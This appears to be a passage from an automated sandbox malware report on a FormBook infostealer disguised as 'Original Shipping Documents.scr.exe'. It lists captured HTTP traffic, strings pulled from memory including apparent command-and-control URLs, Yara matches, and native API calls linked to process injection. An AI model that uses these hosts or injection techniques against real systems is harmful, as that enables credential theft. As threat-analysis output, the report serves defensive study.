61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:27 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 25 Apr 2025 14:08:29 GMTContent-Type: text/htmlContent-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: SecEdit.exe, 00000010.00000002.3851116276.00000000036D4000.00000004.10000000.00040000.00000000.sdmp, xBk0IlKjg.exe, 00000011.00000002.3850351956.0000000003194000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2055916137.0000000003EA4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://Hindi.fit/50pk/?NV0x=UatWUPwGe7DsxKy0VpyPjoZZeqT3/D
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1455329912.0000000003041000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xHOAJKcJeCXuc.exe, 00000009.00000002.1656092706.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
Source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr	String found in binary or memory: http://tempuri.org/Book_Mgt_System_01DataSet.xsd
Source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr	String found in binary or memory: http://tempuri.org/Student_Management_System_02DataSet.xsdIBook_Mgt_System.Properties.Resources
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: xBk0IlKjg.exe, 00000011.00000002.3852328512.0000000005237000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fix.shopping
Source: xBk0IlKjg.exe, 00000011.00000002.3852328512.0000000005237000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.fix.shopping/39bh/
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1466850109.00000000071F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033R
Source: SecEdit.exe, 00000010.00000002.3849651901.0000000002A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: SecEdit.exe, 00000010.00000003.1927649800.000000000776A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SecEdit.exe, 00000010.00000002.3853415681.0000000007798000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Original Shipping Documents.scr.exe

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0042C9E3 NtClose,	8_2_0042C9E3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82B60 NtClose,LdrInitializeThunk,	8_2_01A82B60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01A82DF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01A82C70
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A835C0 NtCreateMutant,LdrInitializeThunk,	8_2_01A835C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A84340 NtSetContextThread,	8_2_01A84340
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A84650 NtSuspendThread,	8_2_01A84650
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BA0 NtEnumerateValueKey,	8_2_01A82BA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82B80 NtQueryInformationFile,	8_2_01A82B80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BE0 NtQueryValueKey,	8_2_01A82BE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82BF0 NtAllocateVirtualMemory,	8_2_01A82BF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AB0 NtWaitForSingleObject,	8_2_01A82AB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AF0 NtWriteFile,	8_2_01A82AF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82AD0 NtReadFile,	8_2_01A82AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DB0 NtEnumerateKey,	8_2_01A82DB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82DD0 NtDelayExecution,	8_2_01A82DD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D30 NtUnmapViewOfSection,	8_2_01A82D30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D00 NtSetInformationFile,	8_2_01A82D00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82D10 NtMapViewOfSection,	8_2_01A82D10
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CA0 NtQueryInformationToken,	8_2_01A82CA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CF0 NtOpenProcess,	8_2_01A82CF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82CC0 NtQueryVirtualMemory,	8_2_01A82CC0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C00 NtQueryInformationProcess,	8_2_01A82C00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82C60 NtCreateKey,	8_2_01A82C60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FA0 NtQuerySection,	8_2_01A82FA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FB0 NtResumeThread,	8_2_01A82FB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F90 NtProtectVirtualMemory,	8_2_01A82F90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82FE0 NtCreateFile,	8_2_01A82FE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F30 NtCreateSection,	8_2_01A82F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82F60 NtCreateProcessEx,	8_2_01A82F60
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82EA0 NtAdjustPrivilegesToken,	8_2_01A82EA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82E80 NtReadVirtualMemory,	8_2_01A82E80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82EE0 NtQueueApcThread,	8_2_01A82EE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A82E30 NtWriteVirtualMemory,	8_2_01A82E30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83090 NtSetValueKey,	8_2_01A83090
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83010 NtOpenDirectoryObject,	8_2_01A83010
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A839B0 NtGetContextThread,	8_2_01A839B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83D10 NtOpenProcessToken,	8_2_01A83D10
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A83D70 NtOpenThread,	8_2_01A83D70

Detected potential crypto function

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05473E28	0_2_05473E28
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_0547F1A4	0_2_0547F1A4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05477018	0_2_05477018
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05586F98	0_2_05586F98
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05580218	0_2_05580218
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05580228	0_2_05580228
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_05586F61	0_2_05586F61
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075E5EB0	0_2_075E5EB0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF458	0_2_075EF458
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF456	0_2_075EF456
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF020	0_2_075EF020
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EEBE8	0_2_075EEBE8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EEBB8	0_2_075EEBB8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_075EF890	0_2_075EF890
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004188D3	8_2_004188D3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0041011A	8_2_0041011A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00410123	8_2_00410123
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00403190	8_2_00403190
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00401230	8_2_00401230
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416AD0	8_2_00416AD0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416AD3	8_2_00416AD3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00410343	8_2_00410343
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E333	8_2_0040E333
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E478	8_2_0040E478
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040E483	8_2_0040E483
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004026A1	8_2_004026A1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004026B0	8_2_004026B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0042EFF3	8_2_0042EFF3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B101AA	8_2_01B101AA
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B081CC	8_2_01B081CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40100	8_2_01A40100
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEA118	8_2_01AEA118
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD8158	8_2_01AD8158
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE2000	8_2_01AE2000
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5E3F0	8_2_01A5E3F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B103E6	8_2_01B103E6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0A352	8_2_01B0A352
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AD02C0	8_2_01AD02C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0274	8_2_01AF0274
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B10591	8_2_01B10591
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50535	8_2_01A50535
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFE4F6	8_2_01AFE4F6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF4420	8_2_01AF4420
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B02446	8_2_01B02446
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4C7C0	8_2_01A4C7C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50770	8_2_01A50770
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A74750	8_2_01A74750
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6C6E0	8_2_01A6C6E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A529A0	8_2_01A529A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B1A9A6	8_2_01B1A9A6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A66962	8_2_01A66962
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A368B8	8_2_01A368B8
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A7E8F0	8_2_01A7E8F0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A52840	8_2_01A52840
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5A840	8_2_01A5A840
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B06BD7	8_2_01B06BD7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0AB40	8_2_01B0AB40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4EA80	8_2_01A4EA80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A68DBF	8_2_01A68DBF
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A4ADE0	8_2_01A4ADE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5AD00	8_2_01A5AD00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AECD1F	8_2_01AECD1F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF0CB5	8_2_01AF0CB5
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A40CF2	8_2_01A40CF2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50C00	8_2_01A50C00
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ACEFA0	8_2_01ACEFA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5CFE0	8_2_01A5CFE0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A42FC8	8_2_01A42FC8
